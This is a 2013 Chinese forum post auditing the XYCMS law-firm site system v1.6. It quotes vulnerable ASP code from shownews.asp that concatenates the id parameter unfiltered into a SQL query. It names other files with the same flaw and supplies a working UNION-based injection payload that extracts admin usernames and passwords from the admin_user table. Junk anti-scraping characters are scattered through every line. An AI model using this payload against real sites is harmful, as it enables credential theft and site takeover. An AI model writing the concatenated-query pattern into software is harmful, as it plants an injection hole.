前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
, A! ]& `$ x0 U/ O5 n, A
) i5 x I" ]( ?/ X淫荡分割线$ L9 E- L4 z# }4 Z5 i
--------------------------------------------------------6 _: ^: ^- m+ d8 y) \+ l
# P, n4 }: }. O+ E$ O审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测), ]6 S/ ~( w6 i T) d6 ]; z; m+ d2 R
源码地址:http://down.chinaz.com/soft/29233.htm- s5 K, `4 T9 I0 |4 @* S
# q7 _8 u! D n2 v% a漏洞文件:shownews.asp0 _$ R5 C( s# P; D
漏洞代码:7-13行
" i' {- R; ~* M0 J) g+ z6 h6 t 4 N ^* L1 J: z
& D% Q: l3 m" i9 C2 S<% ) ]% L) d: d- e- t# J$ ]
id=request.QueryString("id")! }6 P" H' x( k) M3 J% F( \2 ^
" O0 o! W3 q, v- R
set snews=server.createobject("adodb.recordset") 3 w) v& @2 o; b$ u6 h E. C
exec="select * from [news] where id="&id# p3 W5 a. y! \" T9 `8 S" K m
snews.open exec,conn,1,1* J) v( @; u, D" X0 `( {! R
%>
! o. p7 ]6 Q; j7 B
6 G$ G8 r4 z9 Z3 b
3 \) h0 S2 v& o# }# m7 o5 q4 _" s什么过滤都没有 直造成注入
# Z. a) v, y6 e" f: h% O: u F; j1 U- f; a' M( ?
注入点:http://127.0.0.1:99/shownews.asp?id=xx
p1 K, f0 ^& i/ |: Y9 C6 v & [. u1 \ C* }: S3 e
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
3 G, ]( v, W3 M; w! X6 `
- w3 ?( ~, B, h0 C4 S0 c
- [: S0 |( o* m2 cexp: union select 1,admin,password,4,5,7 from admin_user
' }6 [ ]) G: t& C' h* a
0 G* _8 W, N' Q( ?0 a7 k |
发表于 2013-4-4 17:28:12
收藏
支持
反对